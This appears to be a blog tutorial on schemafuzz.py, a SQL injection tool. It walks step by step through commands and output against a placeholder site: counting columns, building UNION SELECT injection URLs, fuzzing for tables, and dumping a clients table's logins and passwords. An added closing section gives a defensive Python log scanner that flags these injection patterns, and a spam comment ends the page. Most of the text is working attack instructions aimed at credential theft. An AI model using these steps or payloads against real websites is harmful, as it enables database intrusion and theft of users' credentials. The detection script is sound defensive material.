SchemaFuzz Tutorial

This tutorial tries to explain the basics of using SchemaFuzz.

Step by Step

To find the columns, use the following command:
c:\python26>schemafuzz.py -u "http://www.target.com/index.php?goleft=artikel&artikel=5" --findcol

Result:
|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|

[+] URL:http://www.target.com/index.php?goleft=artikel&artikel=5--
[+] Evasion Used: "+" "--"
[+] 11:14:07
[+] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,3,4,5,
[+] Column Length is: 6
[+] Found null column at column #: 2
[+] SQLi URL: http://www.target.com/index.php?goleft=artikel&artikel=5+AND+1=2+UNION+SELECT+0,1,2,3,4,5--
[+] darkc0de URL: http://www.target.com/index.php?goleft=artikel&artikel=5+AND+1=2+UNION+SELECT+0,1,darkc0de,3,4,5
[-] Done!


To find tables and columns, use the following command:
c:\python26>schemafuzz.py -u "http://www.target.com/index.php?goleft=artikel&artikel=5+AND+1=2+UNION+SELECT+0,1,darkc0de,3,4,5" --fuzz

Result:
|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|

[+] URL:http://www.target.com/index.php?goleft=artikel&artikel=5+and+1=2+union+select+darkc0de,1,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 10:38:29
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: web1_db1
User: web1_u1@localhost
Version: 5.0.24a-Debian_9ubuntu2.4-log
[+] Number of tables names to be fuzzed: 338
[+] Number of column names to be fuzzed: 249
[+] Searching for tables and columns...

[+] Found a table called: tbl_user

[+] Now searching for columns inside table "tbl_user"
[!] Found a column called:user_name
[!] Found a column called:user_password
[!] Found a column called:user_id
[!] Found a column called:user_email
[-] Done searching inside table "tbl_user" for columns!

[+] Found a table called: tbl_clients

[+] Now searching for columns inside table "tbl_clients"
[!] Found a column called:passwd
[!] Found a column called:id
[!] Found a column called:email
[!] Found a column called:name
[!] Found a column called:login
[-] Done searching inside table "tbl_clients" for columns!

[-] [10:46:53]
[-] Total URL Requests 837
[-] Done

Finding usernames and passwords:
1. First we need to know the contents of the table that was found on the target.
2. For example, we want to see the contents of "tbl_clients".
Type the following command:
c:\python26>schemafuzz.py -u "http://www.target.com/index.php?goleft=artikel&artikel=5+AND+1=2+UNION+SELECT+0,1,darkc0de,3,4,5" -D web1_db1 -T tbl_clients --schema

Result:

|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|

[+] URL:http://www.target.com/index.php?goleft=artikel&artikel=5+AND+1=2+UNION+SELECT+0,1,darkc0de,3,4,5--
[+] Evasion Used: "+" "--"
[+] 11:52:16
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: web1_db1
User: web1_u1@localhost
Version: 5.0.24a-Debian_9ubuntu2.4-log
[+] Showing Columns from database "web1_db1" and Table "tbl_clients"
[+] Number of Columns: 6

[Database]: web1_db1
[Table: Columns]
[0]tbl_clients: id,name,email,login,passwd,info

[-] [11:52:24]
[-] Total URL Requests 8
[-] Done

3. Finding the usernames and passwords
Type the following command:
c:\python26>schemafuzz.py -u "http://www.target.com/index.php?goleft=artikel&artikel=5+AND+1=2+UNION+SELECT+0,1,darkc0de,3,4,5" -D web1_db1 -T tbl_clients -C id,name,email,login,passwd,info --dump

Result:
|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|

[+] URL:http://www.target.com/index.php?goleft=artikel&artikel=5+AND+1=2+UNION+SELECT+0,1,darkc0de,3,4,5--
[+] Evasion Used: "+" "--"
[+] 11:57:28
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: web1_db1
User: web1_u1@localhost
Version: 5.0.24a-Debian_9ubuntu2.4-log
[+] Dumping data from database "web1_db1" Table "tbl_clients"
[+] Column(s) ['id', 'name', 'email', 'login', 'passwd', 'info']
[+] Number of Rows: 12

[-] [11:57:38]
[-] Total URL Requests 14
[-] Done


That's all ......
This tutorial is for educational purposes only.
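
The requests shown in the output above leave a recognisable trail in web server access logs. As an added example (not part of the original tutorial and not code from schemafuzz.py), the Python script below flags those request shapes (AND 1=2, UNION SELECT, the darkc0de marker, the trailing --) after URL-decoding and counts hits per client. The log lines, client addresses and function names are constructed for illustration.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote_plus

# Signatures taken from the request shapes in the tool output above.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "false_pivot": re.compile(r"\band\s+1\s*=\s*2\b", re.I),
    "tool_marker": re.compile(r"darkc0de", re.I),
    "trailing_comment": re.compile(r"--\s*$"),
}
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) HTTP/[\d.]+"')

# Constructed sample lines in combined log format; the addresses come from
# the documentation ranges and do not belong to real hosts.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2024:11:14:07 +0000] "GET /index.php?goleft=artikel&artikel=5+AND+1=2+UNION+SELECT+0,1,2,3,4,5-- HTTP/1.1" 200 512
203.0.113.7 - - [01/Jan/2024:11:14:08 +0000] "GET /index.php?goleft=artikel&artikel=5+AND+1=2+UNION+SELECT+0,1,darkc0de,3,4,5 HTTP/1.1" 200 512
203.0.113.7 - - [01/Jan/2024:11:14:09 +0000] "GET /index.php?goleft=artikel&artikel=5%20and%201%3D2%20union%20select%200,1,2 HTTP/1.1" 200 512
198.51.100.20 - - [01/Jan/2024:11:14:10 +0000] "GET /index.php?goleft=artikel&artikel=5 HTTP/1.1" 200 2048
198.51.100.20 - - [01/Jan/2024:11:14:11 +0000] "GET /index.php?goleft=search&q=student+union HTTP/1.1" 200 2048
"""

def classify(query):
    """Return the names of all signatures matching a raw query string."""
    decoded = unquote_plus(query)  # "+" and %xx become literal characters
    return {name for name, rx in SIGNATURES.items() if rx.search(decoded)}

def scan(log_text):
    """Map client address -> Counter of signature hits across its requests."""
    hits = defaultdict(Counter)
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # skip lines that are not in combined log format
        client, target = m.groups()
        _, _, query = target.partition("?")
        hits[client].update(classify(query))
    # Keep only clients with at least one signature hit.
    return {c: n for c, n in hits.items() if n}

if __name__ == "__main__":
    for client, counts in scan(SAMPLE_LOG).items():
        print(client, dict(counts))
```

A high request count from one client in a short window, like the 837 requests in the fuzzing run above, is a second signal worth alerting on alongside these signatures.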

1 comment:

  1. Nice tutorial, bro.
    Also check out my link here, internet provider indonesia, just for your knowledge.
